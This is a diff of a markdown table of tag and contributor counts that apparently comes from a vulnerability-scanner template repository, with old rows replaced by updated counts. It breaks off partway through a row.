| | | -| dlink | 21 | joanbono | 5 | | | | | | | -| tomcat | 21 | podalirius | 5 | | | | | | | -| cloud | 21 | shine | 5 | | | | | | | -| msf | 21 | yanyun | 5 | | | | | | | -| camera | 20 | s0obi | 5 | | | | | | | -| ssl | 20 | robotshell | 5 | | | | | | | -| fortinet | 20 | ganofins | 5 | | | | | | | -| cicd | 20 | wisnupramoedya | 4 | | | | | | | +| api | 27 | clem9669 | 6 | | | | | | | +| cve2012 | 26 | evan rubinstein | 6 | | | | | | | +| microsoft | 26 | justaacat | 6 | | | | | | | +| jndi | 26 | imnightmaree | 6 | | | | | | | +| proxy | 25 | gitlab red team | 6 | | | | | | | +| k8s | 25 | forgedhallpass | 6 | | | | | | | +| osint-images | 24 | praetorian-thendrickson | 6 | | | | | | | +| firewall | 24 | __fazal | 6 | | | | | | | +| osint-finance | 24 | devang-solanki | 6 | | | | | | | +| osint-business | 24 | xelkomy | 6 | | | | | | | +| manageengine | 24 | ja1sh | 6 | | | | | | | +| osint-shopping | 24 | shine | 5 | | | | | | | +| amazon | 23 | mr-xn | 5 | | | | | | | +| stored-xss | 23 | kazet | 5 | | | | | | | +| zoho | 23 | yanyun | 5 | | | | | | | +| wp-theme | 23 | s0obi | 5 | | | | | | | +| keys | 22 | podalirius | 5 | | | | | | | +| cloud | 21 | panch0r3d | 5 | | | | | | | +| dlink | 21 | prajiteshsingh | 5 | | | | | | | +| tomcat | 21 | r12w4n | 5 | | | | | | | +| msf | 21 | defr0ggy | 5 | | | | | | | +| weblogic | 21 | kh4sh3i | 5 | | | | | | | +| ibm | 21 | vicrack | 5 | | | | | | | +| cicd | 20 | ganofins | 5 | | | | | | | +| fortinet | 20 | robotshell | 5 | | | | | | | +| github | 20 | bhutch | 5 | | | | | | | +| admin | 20 | joanbono | 5 | | | | | | | +| camera | 20 | r3naissance | 4 | | | | | | | +| ssl | 20 | 3th1c_yuk1 | 4 | | | | | | | +| dns | 19 | megamansec | 4 | | | | | | | +| lfr | 19 | lum8rjack | 4 | | | | | | | | rukovoditel | 19 | powerexploit | 4 | | | | | | | -| jenkins | 19 | 3th1c_yuk1 | 4 | | | | | | | -| github | 19 | h1ei1 | 4 | | | | | | | -| admin | 19 | mastercho | 4 | | | | | | | -| struts | 19 | r3naissance | 4 | | | | | | | -| osint-music | 18 | megamansec | 4 | | | | | | | -| wavlink | 18 | dadevel | 4 | | | | | | | -| printer | 18 | arm!tage | 4 | | | | | | | -| ftp | 18 | ggranjus | 4 | | | | | | | -| lfr | 18 | dolev farhi | 4 | | | | | | | -| grafana | 18 | e_schultze_ | 4 | | | | | | | -| service | 18 | tanq16 | 4 | | | | | | | -| dns | 18 | incogbyte | 4 | | | | | | | -| xxe | 17 | scent2d | 4 | | | | | | | -| nginx | 17 | taielab | 3 | | | | | | | -| cve2011 | 17 | emenalf | 3 | | | | | | | -| osint-blog | 16 | matt galligan | 3 | | | | | | | -| citrix | 16 | shifacyclewala | 3 | | | | | | | -| cve2009 | 16 | yuzhe-zhang-0 | 3 | | | | | | | -| backup | 16 | davidmckennirey | 3 | | | | | | | -| magento | 15 | alifathi-h1 | 3 | | | | | | | -| android | 15 | dr0pd34d | 3 | | | | | | | -| status | 15 | bernardofsr | 3 | | | | | | | -| cve2008 | 15 | skeltavik | 3 | | | | | | | -| java | 15 | fxploit | 3 | | | | | | | -| hp | 15 | unstabl3 | 3 | | | | | | | -| jarm | 15 | splint3r7 | 3 | | | | | | | -| enum | 14 | dudez | 3 | | | | | | | -| osint-health | 14 | andydoering | 3 | | | | | | | -| woocommerce | 14 | impramodsargar | 3 | | | | | | | -| cve2013 | 14 | f1tz | 3 | | | | | | | -| osint-art | 14 | mavericknerd | 3 | | | | | | | -| confluence | 14 | fyoorer | 3 | | | | | | | -| zyxel | 14 | true13 | 3 | | | | | | | -| audit | 14 | k0pak4 | 3 | | | | | | | -| domainmod | 14 | canberbamber | 3 | | | | | | | -| nodejs | 14 | whoever | 3 | | | | | | | -| coldfusion | 14 | lum8rjack | 3 | | | | | | | -| jboss | 14 | badboycxcc | 3 | | | | | | | -| mail | 14 | jarijaas | 3 | | | | | | | -| creds-stuffing | 13 | lucasljm2001 | 3 | | | | | | | -| abstractapi | 13 | thomas_from_offensity | 3 | | | | | | | -| cnvd2021 | 13 | randomrobbie | 3 | | | | | | | -| ruijie | 13 | johnjhacking | 3 | | | | | | | -| fortigate | 13 | parth | 3 | | | | | | | -| cuppa | 13 | binaryfigments | 3 | | | | | | | -| login-check | 13 | huowuzhao | 3 | | | | | | | -| azure | 13 | _generic_human_ | 3 | | | | | | | -| airflow | 13 | vagnerd | 3 | | | | | | | -| osint-political | 13 | ph33r | 3 | | | | | | | -| laravel | 13 | z3bd | 3 | | | | | | | -| osint-dating | 13 | vsh00t | 3 | | | | | | | -| npm | 13 | yash anand @yashanand155 | 3 | | | | | | | -| dell | 12 | ambassify | 3 | | | | | | | -| drupal | 12 | ekrause | 3 | | | | | | | -| kafka | 12 | cheesymoon | 3 | | | | | | | -| git | 12 | atomiczsec | 3 | | | | | | | -| dashboard | 12 | nybble04 | 3 | | | | | | | -| rails | 12 | arcc | 3 | | | | | | | -| bypass | 12 | lark-lab | 3 | | | | | | | -| graphql | 12 | m4lwhere | 3 | | | | | | | -| netgear | 12 | me9187 | 3 | | | | | | | -| ruby | 12 | 0w4ys | 3 | | | | | | | -| auth | 12 | evergreencartoons | 3 | | | | | | | -| netsweeper | 12 | swissky | 3 | | | | | | | -| backdoor | 12 | sushantkamble | 3 | | | | | | | -| microweber | 12 | hahwul | 3 | | | | | | | -| alibaba | 12 | huta0 | 3 | | | | | | | -| webserver | 12 | myztique | 2 | | | | | | | -| vpn | 12 | bsysop | 2 | | | | | | | -| setup | 11 | wa1tf0rme | 2 | | | | | | | -| osint-video | 11 | gevakun | 2 | | | | | | | -| spring | 11 | korteke | 2 | | | | | | | -| online-fire-reporting | 11 | paperpen | 2 | | | | | | | +| struts | 19 | scent2d | 4 | | | | | | | +| jenkins | 19 | dadevel | 4 | | | | | | | +| printer | 18 | ggranjus | 4 | | | | | | | +| osint-music | 18 | tanq16 | 4 | | | | | | | +| ftp | 18 | wisnupramoedya | 4 | | | | | | | +| service | 18 | e_schultze_ | 4 | | | | | | | +| grafana | 18 | dolev farhi | 4 | | | | | | | +| wavlink | 18 | h1ei1 | 4 | | | | | | | +| nginx | 17 | incogbyte | 4 | | | | | | | +| xxe | 17 | arm!tage | 4 | | | | | | | +| cve2011 | 17 | sushantkamble | 3 | | | | | | | +| osint-blog | 16 | ambassify | 3 | | | | | | | +| cve2009 | 16 | taielab | 3 | | | | | | | +| citrix | 16 | dr0pd34d | 3 | | | | | | | +| backup | 16 | unstabl3 | 3 | | | | | | | +| status | 15 | jarijaas | 3 | | | | | | | +| android | 15 | f1tz | 3 | | | | | | | +| magento | 15 | whoever | 3 | | | | | | | +| cve2008 | 15 | bernardofsr | 3 | | | | | | | +| jarm | 15 | m4lwhere | 3 | | | | | | | +| java | 15 | arcc | 3 | | | | | | | +| hp | 15 | huowuzhao | 3 | | | | | | | +| confluence | 14 | alifathi-h1 | 3 | | | | | | | +| zyxel | 14 | mavericknerd | 3 | | | | | | | +| audit | 14 | fyoorer | 3 | | | | | | | +| npm | 14 | true13 | 3 | | | | | | | +| woocommerce | 14 | me9187 | 3 | | | | | | | +| osint-art | 14 | ph33r | 3 | | | | | | | +| nodejs | 14 | dudez | 3 | | | | | | | +| osint-health | 14 | impramodsargar | 3 | | | | | | | +| mail | 14 | fxploit | 3 | | | | | | | +| coldfusion | 14 | matt galligan | 3 | | | | | | | +| enum | 14 | johnjhacking | 3 | | | | | | | +| jboss | 14 | vagnerd | 3 | | | | | | | +| cve2013 | 14 | shifacyclewala | 3 | | | | | | | +| cnvd2021 | 14 | _generic_human_ | 3 | | | | | | | +| domainmod | 14 | badboycxcc | 3 | | | | | | | +| cuppa | 13 | nybble04 | 3 | | | | | | | +| ruijie | 13 | lucasljm2001 | 3 | | | | | | | +| osint-political | 13 | thomas_from_offensity | 3 | | | | | | | +| vpn | 13 | huta0 | 3 | | | | | | | +| fortigate | 13 | hahwul | 3 | | | | | | | +| abstractapi | 13 | andydoering | 3 | | | | | | | +| osint-dating | 13 | ekrause | 3 | | | | | | | +| login-check | 13 | atomiczsec | 3 | | | | | | | +| bypass | 13 | evergreencartoons | 3 | | | | | | | +| creds-stuffing | 13 | k0pak4 | 3 | | | | | | | +| airflow | 13 | canberbamber | 3 | | | | | | | +| laravel | 13 | yuzhe-zhang-0 | 3 | | | | | | | +| azure | 13 | binaryfigments | 3 | | | | | | | +| webserver | 12 | swissky | 3 | | | | | | | +| netsweeper | 12 | parth | 3 | | | | | | | +| alibaba | 12 | z3bd | 3 | | | | | | | +| drupal | 12 | imjust0 | 3 | | | | | | | +| sonicwall | 12 | emenalf | 3 | | | | | | | +| rails | 12 | 0w4ys | 3 | | | | | | | +| dell | 12 | splint3r7 | 3 | | | | | | | +| kafka | 12 | davidmckennirey | 3 | | | | | | | +| git | 12 | skeltavik | 3 | | | | | | | +| netgear | 12 | vsh00t | 3 | | | | | | | +| graphql | 12 | randomrobbie | 3 | | | | | | | +| microweber | 12 | lark-lab | 3 | | | | | | | +| backdoor | 12 | cheesymoon | 3 | | | | | | | +| zimbra | 12 | yash anand @yashanand155 | 3 | | | | | | | +| dashboard | 12 | clarkvoss | 2 | | | | | | | +| auth | 12 | k11h-de | 2 | | | | | | | +| ruby | 12 | sy3omda | 2 | | | | | | | +| setup | 11 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| osint-video | 11 | brenocss | 2 | | | | | | | +| ecology | 11 | dbrwsky | 2 | | | | | | | +| docker | 11 | cocxanh | 2 | | | | | | | +| online-fire-reporting | 11 | manas_harsh | 2 | | | | | | | +| spring | 11 | d4vy | 2 | | | | | | | | xstream | 11 | israel comazzetto dos reis | 2 | | | | | | | -| docker | 11 | bing0o | 2 | | | | | | | -| phpmyadmin | 11 | k11h-de | 2 | | | | | | | -| zimbra | 11 | hackerarpan | 2 | | | | | | | -| sonicwall | 11 | 0xnirvana | 2 | | | | | | | -| windows | 10 | thardt-praetorian | 2 | | | | | | | -| digitalocean | 10 | 0xprial | 2 | | | | | | | -| db | 10 | nuk3s3c | 2 | | | | | | | -| ssti | 10 | c3l3si4n | 2 | | | | | | | -| glpi | 10 | coldfish | 2 | | | | | | | -| headless | 10 | koti2 | 2 | | | | | | | -| django | 10 | sbani | 2 | | | | | | | -| prometheus | 10 | heeress | 2 | | | | | | | -| solarview | 10 | luci | 2 | | | | | | | -| symfony | 10 | vavkamil | 2 | | | | | | | -| redis | 10 | nkxxkn | 2 | | | | | | | -| dedecms | 10 | z0ne | 2 | | | | | | | -| ssh | 10 | nvn1729 | 2 | | | | | | | -| jolokia | 10 | danielmofer | 2 | | | | | | | -| thinkphp | 10 | dbrwsky | 2 | | | | | | | -| fastjson | 9 | y4er | 2 | | | | | | | -| ecology | 9 | ajaysenr | 2 | | | | | | | -| cache | 9 | shelled | 2 | | | | | | | -| pfsense | 9 | v0idc0de | 2 | | | | | | | -| cnvd2020 | 9 | rafaelwdornelas | 2 | | | | | | | -| opencats | 9 | codexlynx | 2 | | | | | | | -| node | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| firebase | 9 | ayadim | 2 | | | | | | | -| solr | 9 | dogancanbakir | 2 | | | | | | | -| bitbucket | 9 | raesene | 2 | | | | | | | -| kube | 9 | convisoappsec | 2 | | | | | | | -| elasticsearch | 9 | kishore-hariram | 2 | | | | | | | -| installer | 9 | martincodes-de | 2 | | | | | | | -| vcenter | 9 | paradessia | 2 | | | | | | | -| druid | 9 | gal nagli | 2 | | | | | | | -| scada | 9 | bp0lr | 2 | | | | | | | -| sitecore | 9 | d4vy | 2 | | | | | | | -| versa | 9 | maximus decimus | 2 | | | | | | | -| zabbix | 9 | notnotnotveg | 2 | | | | | | | -| gitea | 9 | manas_harsh | 2 | | | | | | | -| wso2 | 9 | cckuakilong | 2 | | | | | | | -| exchange | 8 | pxmme1337 | 2 | | | | | | | -| console | 8 | 0xcrypto | 2 | | | | | | | -| vbulletin | 8 | mohammedsaneem | 2 | | | | | | | -| jetbrains | 8 | amsda | 2 | | | | | | | -| default-page | 8 | brucelsone | 2 | | | | | | | -| mirai | 8 | joshua rogers | 2 | | | | | | | -| iis | 8 | x1m_martijn | 2 | | | | | | | -| atom | 8 | kiblyn11 | 2 | | | | | | | -| cisco-switch | 8 | 0xsmiley | 2 | | | | | | | -| metadata | 8 | dheerajmadhukar | 2 | | | | | | | -| emerge | 8 | udit_thakkur | 2 | | | | | | | -| config-audit | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| oauth | 8 | kre80r | 2 | | | | | | | -| bucket | 8 | 666asd | 2 | | | | | | | -| spotweb | 8 | randomdhiraj | 2 | | | | | | | -| osint-news | 8 | e1a | 2 | | | | | | | -| recon | 8 | bananabr | 2 | | | | | | | -| icewarp | 8 | dahse89 | 2 | | | | | | | -| smtp | 8 | uomogrande | 2 | | | | | | | -| hms | 8 | sinkettu | 2 | | | | | | | -| unauthenticated | 8 | socketz | 2 | | | | | | | -| ognl | 8 | geekby | 2 | | | | | | | -| manager | 8 | 0xrudra | 2 | | | | | | | -| crlf | 8 | j3ssie | 2 | | | | | | | -| squirrelmail | 7 | smaranchand | 2 | | | | | | | -| nagios | 7 | gtrrnr | 2 | | | | | | | -| websphere | 7 | brenocss | 2 | | | | | | | -| ofbiz | 7 | joeldeleep | 2 | | | | | | | -| hashicorp | 7 | ep1csage | 2 | | | | | | | -| huawei | 7 | clarkvoss | 2 | | | | | | | -| vms | 7 | hetroublemakr | 2 | | | | | | | -| odoo | 7 | github.com/its0x08 | 2 | | | | | | | -| error | 7 | afaq | 2 | | | | | | | -| go | 7 | zomsop82 | 2 | | | | | | | -| fortios | 7 | g4l1t0 | 2 | | | | | | | -| discord | 7 | ehsahil | 2 | | | | | | | -| blockchain | 7 | sascha brendel | 2 | | | | | | | -| maps | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| ec2 | 7 | ree4pwn | 2 | | | | | | | -| sophos | 7 | cocxanh | 2 | | | | | | | -| avtech | 7 | supras | 2 | | | | | | | -| mobileiron | 7 | streetofhackerr007 | 2 | | | | | | | -| dropbox | 7 | joshlarsen | 2 | | | | | | | -| gogs | 7 | 8arthur | 2 | | | | | | | -| shopify | 7 | thezakman | 2 | | | | | | | -| sangfor | 7 | lotusdll | 2 | | | | | | | -| facebook | 7 | 0xelkomy | 2 | | | | | | | -| blind | 7 | moritz nentwig | 2 | | | | | | | -| seeyon | 7 | n-thumann | 2 | | | | | | | -| nagiosxi | 7 | 0xsapra | 2 | | | | | | | -| samsung | 7 | w4cky_ | 2 | | | | | | | -| secret | 7 | redteambrasil | 2 | | | | | | | -| s3 | 6 | sy3omda | 2 | | | | | | | -| moodle | 6 | foulenzer | 2 | | | | | | | -| sonarqube | 6 | th3r4id | 1 | | | | | | | -| opensis | 6 | thelicato | 1 | | | | | | | -| zhiyuan | 6 | af001 | 1 | | | | | | | -| mongodb | 6 | jeya.seelan | 1 | | | | | | | -| fpd | 6 | 5up3r541y4n | 1 | | | | | | | -| hikvision | 6 | realexp3rt | 1 | | | | | | | -| solarwinds | 6 | couskito | 1 | | | | | | | -| database | 6 | fopina | 1 | | | | | | | -| magmi | 6 | arall | 1 | | | | | | | -| artica | 6 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| newrelic | 6 | parzival | 1 | | | | | | | -| jeecg | 6 | mabdullah22 | 1 | | | | | | | -| kubelet | 6 | jrolf | 1 | | | | | | | -| nacos | 6 | carrot2 | 1 | | | | | | | -| slack | 6 | oscarintherocks | 1 | | | | | | | -| oa | 6 | aaban solutions | 1 | | | | | | | -| elfinder | 6 | miryangjung | 1 | | | | | | | -| filemanager | 6 | mariam tariq | 1 | | | | | | | -| nexus | 6 | elouhi | 1 | | | | | | | -| liferay | 6 | shifacyclewla | 1 | | | | | | | -| rconfig | 6 | kiks7 | 1 | | | | | | | -| 74cms | 6 | zy9ard3 | 1 | | | | | | | -| bigip | 6 | jc175 | 1 | | | | | | | -| tikiwiki | 6 | arr0way | 1 | | | | | | | -| plesk | 6 | danigoland | 1 | | | | | | | -| flutterwave | 6 | hakimkt | 1 | | | | | | | -| minio | 6 | marcio mendes | 1 | | | | | | | -| ivanti | 6 | kailashbohara | 1 | | | | | | | -| jetty | 6 | aayush vishnoi | 1 | | | | | | | -| pmb | 6 | majidmc2 | 1 | | | | | | | -| lucee | 6 | ptonewreckin | 1 | | | | | | | -| activemq | 6 | toufik-airane | 1 | | | | | | | -| keycloak | 6 | whynotke | 1 | | | | | | | -| jamf | 6 | pphuahua | 1 | | | | | | | -| microstrategy | 6 | secthebit | 1 | | | | | | | -| cobbler | 6 | lark lab | 1 | | | | | | | -| doctor-appointment-system | 6 | 1nf1n7y | 1 | | | | | | | -| openvpn | 6 | yuansec | 1 | | | | | | | -| webmin | 6 | lamscun | 1 | | | | | | | -| symantec | 6 | mrharshvardhan | 1 | | | | | | | -| python | 6 | kaizensecurity | 1 | | | | | | | -| leak | 6 | ipanda | 1 | | | | | | | -| resin | 5 | _c0wb0y_ | 1 | | | | | | | -| sql | 5 | nytr0gen | 1 | | | | | | | -| vrealize | 5 | b4uh0lz | 1 | | | | | | | -| prestashop | 5 | omarkurt | 1 | | | | | | | -| openemr | 5 | zsusac | 1 | | | | | | | -| fatpipe | 5 | j3ssie/geraldino2 | 1 | | | | | | | -| cockpit | 5 | guax1 | 1 | | | | | | | -| akamai | 5 | r3nz0 | 1 | | | | | | | -| bmc | 5 | bjhulst | 1 | | | | | | | -| web3 | 5 | mass0ma | 1 | | | | | | | -| circarlife | 5 | mhdsamx | 1 | | | | | | | -| carrental | 5 | pry0cc | 1 | | | | | | | -| couchdb | 5 | sinsinology | 1 | | | | | | | -| parallels | 5 | orpheus | 1 | | | | | | | -| rfi | 5 | _harleo | 1 | | | | | | | -| typo3 | 5 | freakyclown | 1 | | | | | | | -| ruckus | 5 | arliya | 1 | | | | | | | -| rseenet | 5 | jeya seelan | 1 | | | | | | | -| tenda | 5 | screamy | 1 | | | | | | | -| asana | 5 | luisfelipe146 | 1 | | | | | | | -| server | 5 | rivalsec | 1 | | | | | | | -| hybris | 5 | act1on3 | 1 | | | | | | | -| avideo | 5 | micha3lb3n | 1 | | | | | | | -| paypal | 5 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| geoserver | 5 | borna nematzadeh | 1 | | | | | | | -| elastic | 5 | william söderberg @ withsecure | 1 | | | | | | | -| storage | 5 | notsoevilweasel | 1 | | | | | | | -| square | 5 | 8authur | 1 | | | | | | | -| heroku | 5 | aringo-bf | 1 | | | | | | | -| jwt | 5 | erethon | 1 | | | | | | | -| kkfileview | 5 | shiar | 1 | | | | | | | -| awstats | 5 | jteles | 1 | | | | | | | -| gocd | 5 | qlkwej | 1 | | | | | | | -| apisix | 5 | topscoder | 1 | | | | | | | -| microfocus | 5 | evan rubinstien | 1 | | | | | | | -| cacti | 5 | mah3sec_ | 1 | | | | | | | -| zzzcms | 5 | tehtbl | 1 | | | | | | | -| strapi | 5 | bibeksapkota (sar00n) | 1 | | | | | | | -| asp | 5 | ahmed abou-ela | 1 | | | | | | | -| adminer | 5 | geraldino2 | 1 | | | | | | | -| ethereum | 5 | shelld3v | 1 | | | | | | | -| terramaster | 5 | myst7ic | 1 | | | | | | | -| phpinfo | 5 | push4d | 1 | | | | | | | -| metinfo | 5 | exploitation | 1 | | | | | | | -| caucho | 5 | alex | 1 | | | | | | | -| jupyter | 5 | x6263 | 1 | | | | | | | -| firmware | 5 | bad5ect0r | 1 | | | | | | | -| avaya | 5 | ola456 | 1 | | | | | | | -| cloudflare | 4 | gpiechnik2 | 1 | | | | | | | -| hongdian | 4 | galoget | 1 | | | | | | | -| hoteldruid | 4 | clment cruchet | 1 | | | | | | | -| powerjob | 4 | 0xd0ff9 | 1 | | | | | | | -| xmlrpc | 4 | viniciuspereiras | 1 | | | | | | | -| mlflow | 4 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| express | 4 | xianke | 1 | | | | | | | -| openstack | 4 | zandros0 | 1 | | | | | | | -| age-encryption | 4 | luqman | 1 | | | | | | | -| gnuboard | 4 | ynnirc | 1 | | | | | | | -| seagate | 4 | jbertman | 1 | | | | | | | -| flickr | 4 | yashanand155 | 1 | | | | | | | -| mysql | 4 | bartu utku sarp | 1 | | | | | | | -| dropbear | 4 | akokonunes | 1 | | | | | | | -| churchcrm | 4 | jub0bs | 1 | | | | | | | -| redmine | 4 | aaronchen0 | 1 | | | | | | | -| casaos | 4 | izn0u | 1 | | | | | | | -| zend | 4 | luqmaan hadia | 1 | | | | | | | -| swagger | 4 | keni0k | 1 | | | | | | | -| prtg | 4 | charanrayudu | 1 | | | | | | | -| pie-register | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| ems | 4 | pudsec | 1 | | | | | | | -| elementor | 4 | ramkrishna sawant | 1 | | | | | | | -| telerik | 4 | fq_hsu | 1 | | | | | | | -| kevinlab | 4 | dawid-czarnecki | 1 | | | | | | | -| kentico | 4 | 0xh7ml | 1 | | | | | | | -| royalevent | 4 | jas37 | 1 | | | | | | | -| panos | 4 | chron0x | 1 | | | | | | | -| postmessage | 4 | sherlocksecurity | 1 | | | | | | | -| qdpm | 4 | b0rn2r00t | 1 | | | | | | | -| qnap | 4 | mukundbhuva | 1 | | | | | | | -| photo | 4 | 2rs3c | 1 | | | | | | | -| sendgrid | 4 | nobody | 1 | | | | | | | -| flink | 4 | yavolo | 1 | | | | | | | -| artifactory | 4 | sicksec | 1 | | | | | | | -| yeswiki | 4 | b0yd | 1 | | | | | | | -| bittrex | 4 | prettyboyaaditya | 1 | | | | | | | -| beyondtrust | 4 | zinminphy0 | 1 | | | | | | | -| ebs | 4 | ilovebinbash | 1 | | | | | | | -| search | 4 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| umbraco | 4 | ahmetpergamum | 1 | | | | | | | -| voip | 4 | ofjaaah | 1 | | | | | | | -| confluent | 4 | zhenwarx | 1 | | | | | | | -| linkerd | 4 | retr0 | 1 | | | | | | | -| pixie | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| candidats | 4 | natto97 | 1 | | | | | | | -| consul | 4 | stupidfish | 1 | | | | | | | -| rabbitmq | 4 | vikas kundu | 1 | | | | | | | -| thinkcmf | 4 | gboddin | 1 | | | | | | | -| cnvd2019 | 4 | httpvoid | 1 | | | | | | | -| nextjs | 4 | flag007 | 1 | | | | | | | -| goanywhere | 4 | un-fmunozs | 1 | | | | | | | -| codeigniter | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| pentaho | 4 | intx0x80 | 1 | | | | | | | -| cve2005 | 4 | xshuden | 1 | | | | | | | -| mailchimp | 4 | liquidsec | 1 | | | | | | | -| dolibarr | 4 | patrick pirker | 1 | | | | | | | -| horde | 4 | dmartyn | 1 | | | | | | | -| hpe | 4 | nielsing | 1 | | | | | | | -| graylog | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| mautic | 4 | furkansayim | 1 | | | | | | | -| centos | 4 | ndmalc | 1 | | | | | | | -| cve2007 | 4 | tirtha | 1 | | | | | | | -| aura | 4 | zeyad azima | 1 | | | | | | | -| sentry | 4 | lethargynavigator | 1 | | | | | | | -| httpserver | 4 | yashgoti | 1 | | | | | | | -| datadog | 4 | sshell | 1 | | | | | | | -| axigen | 4 | dievus | 1 | | | | | | | -| javascript | 4 | 0xteles | 1 | | | | | | | -| telesquare | 4 | philippdelteil | 1 | | | | | | | -| nosqli | 4 | jcockhren | 1 | | | | | | | -| metasploit | 4 | therealtoastycat | 1 | | | | | | | -| ldap | 4 | jaskaran | 1 | | | | | | | -| openfire | 4 | florianmaak | 1 | | | | | | | -| harbor | 4 | iampritam | 1 | | | | | | | -| log | 4 | hanlaomo | 1 | | | | | | | -| mostracms | 4 | naglis | 1 | | | | | | | -| mostra | 4 | aresx | 1 | | | | | | | -| roxy | 4 | shivampand3y | 1 | | | | | | | -| httpd | 4 | andirrahmani1 | 1 | | | | | | | -| springcloud | 4 | elmahdi | 1 | | | | | | | -| stripe | 4 | d0rkerdevil | 1 | | | | | | | -| ampache | 4 | pjborah | 1 | | | | | | | -| concrete | 4 | j33n1k4 | 1 | | | | | | | -| metabase | 4 | nuts7 | 1 | | | | | | | -| aspose | 4 | mzack9999 | 1 | | | | | | | -| wcs | 4 | jna1 | 1 | | | | | | | -| panabit | 4 | juliosmelo | 1 | | | | | | | -| jellyfin | 4 | lixts | 1 | | | | | | | -| puppet | 4 | failopen | 1 | | | | | | | -| zte | 4 | absshax | 1 | | | | | | | -| mikrotik | 4 | mesaglio | 1 | | | | | | | -| arcgis | 4 | amnotacat | 1 | | | | | | | -| kibana | 4 | opencirt | 1 | | | | | | | -| froxlor | 4 | lingtren | 1 | | | | | | | -| finicity | 4 | dabla | 1 | | | | | | | -| newstatpress | 4 | husain | 1 | | | | | | | -| grav | 4 | andysvints | 1 | | | | | | | -| webshell | 4 | millermedia | 1 | | | | | | | -| spark | 4 | cookiehanhoan | 1 | | | | | | | -| tls | 4 | 0xtavian | 1 | | | | | | | -| easypost | 4 | aceseven (digisec360) | 1 | | | | | | | -| osint-archived | 4 | unkl4b | 1 | | | | | | | -| phppgadmin | 4 | 0ut0fb4nd | 1 | | | | | | | -| actuator | 3 | affix | 1 | | | | | | | -| processwire | 3 | ohlinge | 1 | | | | | | | -| targa | 3 | undefl0w | 1 | | | | | | | -| listserv | 3 | pratik khalane | 1 | | | | | | | -| openbmcs | 3 | irshadahamed | 1 | | | | | | | -| nortek | 3 | jaimin gondaliya | 1 | | | | | | | -| casdoor | 3 | thirukrishnan | 1 | | | | | | | -| dzzoffice | 3 | shockwave | 1 | | | | | | | -| thinfinity | 3 | remonsec | 1 | | | | | | | -| ansible | 3 | 0xceba | 1 | | | | | | | -| env | 3 | ayadi | 1 | | | | | | | -| sharefile | 3 | alperenkesk | 1 | | | | | | | -| telnet | 3 | ramondunker | 1 | | | | | | | -| flutter | 3 | aravind | 1 | | | | | | | -| messaging | 3 | mayankpandey01 | 1 | | | | | | | -| globalprotect | 3 | duty_1g | 1 | | | | | | | -| axis | 3 | supr4s | 1 | | | | | | | -| r-seenet | 3 | unp4ck | 1 | | | | | | | -| saltstack | 3 | noah @thesubtlety | 1 | | | | | | | -| cnvd2022 | 3 | numan türle | 1 | | | | | | | -| asus | 3 | thebinitghimire | 1 | | | | | | | -| teamcity | 3 | exid | 1 | | | | | | | -| fuelcms | 3 | adrianmf | 1 | | | | | | | -| covenant | 3 | francescocarlucci | 1 | | | | | | | -| lighttpd | 3 | exceed | 1 | | | | | | | -| dotcms | 3 | aaron_costello | 1 | | | | | | | +| phpmyadmin | 11 | y4er | 2 | | | | | | | +| django | 10 | maximus decimus | 2 | | | | | | | +| jolokia | 10 | 0xrudra | 2 | | | | | | | +| redis | 10 | 0xsapra | 2 | | | | | | | +| symfony | 10 | sascha brendel | 2 | | | | | | | +| node | 10 | wa1tf0rme | 2 | | | | | | | +| digitalocean | 10 | github.com/its0x08 | 2 | | | | | | | +| ssh | 10 | ricardo maia (brainfork) | 2 | | | | | | | +| solarview | 10 | brucelsone | 2 | | | | | | | +| ssti | 10 | dahse89 | 2 | | | | | | | +| glpi | 10 | kishore-hariram | 2 | | | | | | | +| db | 10 | hackerarpan | 2 | | | | | | | +| dedecms | 10 | nkxxkn | 2 | | | | | | | +| fastjson | 10 | 0xcrypto | 2 | | | | | | | +| prometheus | 10 | koti2 | 2 | | | | | | | +| thinkphp | 10 | kiblyn11 | 2 | | | | | | | +| icewarp | 10 | c3l3si4n | 2 | | | | | | | +| windows | 10 | geekby | 2 | | | | | | | +| headless | 10 | kre80r | 2 | | | | | | | +| zabbix | 9 | martincodes-de | 2 | | | | | | | +| versa | 9 | joshlarsen | 2 | | | | | | | +| firebase | 9 | g4l1t0 | 2 | | | | | | | +| installer | 9 | x1m_martijn | 2 | | | | | | | +| pfsense | 9 | socketz | 2 | | | | | | | +| gitea | 9 | paperpen | 2 | | | | | | | +| elasticsearch | 9 | thezakman | 2 | | | | | | | +| scada | 9 | z0ne | 2 | | | | | | | +| wso2 | 9 | supras | 2 | | | | | | | +| solr | 9 | gevakun | 2 | | | | | | | +| prestashop | 9 | moritz nentwig | 2 | | | | | | | +| bitbucket | 9 | ayadim | 2 | | | | | | | +| cnvd2020 | 9 | bananabr | 2 | | | | | | | +| opencats | 9 | mohammedsaneem | 2 | | | | | | | +| cache | 9 | 0xnirvana | 2 | | | | | | | +| sitecore | 9 | foulenzer | 2 | | | | | | | +| kube | 9 | cckuakilong | 2 | | | | | | | +| druid | 9 | bing0o | 2 | | | | | | | +| vcenter | 9 | ep1csage | 2 | | | | | | | +| hms | 8 | uomogrande | 2 | | | | | | | +| ognl | 8 | pxmme1337 | 2 | | | | | | | +| crlf | 8 | 666asd | 2 | | | | | | | +| cisco-switch | 8 | zomsop82 | 2 | | | | | | | +| metadata | 8 | hetroublemakr | 2 | | | | | | | +| unauthenticated | 8 | gtrrnr | 2 | | | | | | | +| vbulletin | 8 | gal nagli | 2 | | | | | | | +| spotweb | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| iis | 8 | bsysop | 2 | | | | | | | +| emerge | 8 | 8arthur | 2 | | | | | | | +| recon | 8 | joeldeleep | 2 | | | | | | | +| oauth | 8 | ree4pwn | 2 | | | | | | | +| hikvision | 8 | nvn1729 | 2 | | | | | | | +| default-page | 8 | 